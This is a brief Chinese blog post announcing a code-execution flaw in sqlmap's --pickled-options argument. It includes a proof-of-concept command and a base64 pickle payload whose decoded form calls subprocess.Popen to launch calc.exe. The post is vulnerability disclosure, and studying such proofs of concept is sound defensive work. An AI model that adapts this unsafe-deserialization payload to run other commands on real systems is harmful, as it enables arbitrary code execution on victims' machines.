sqlmap代码执行漏洞

这个漏洞今天在微博上传的比较火。。。。。
下面给出相关POC

sqlmap.py -u "http://www.ihonker.org/s?wd=sqli" --pickled-options "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg=="

base64解码

csubprocessPopenp1(S'calc.exe'p2tp3Rp4.

视频
http://video.weibo.com/player/1034:4cbd333b0bf3af1de46ea99660b9a8b5/v.swf

本文固定链接: https://www.unhonker.com/bug/1865.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年12月09日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: sqlmap代码执行漏洞 | 90' s Blog|关注网络信息安全
关键字:

sqlmap代码执行漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!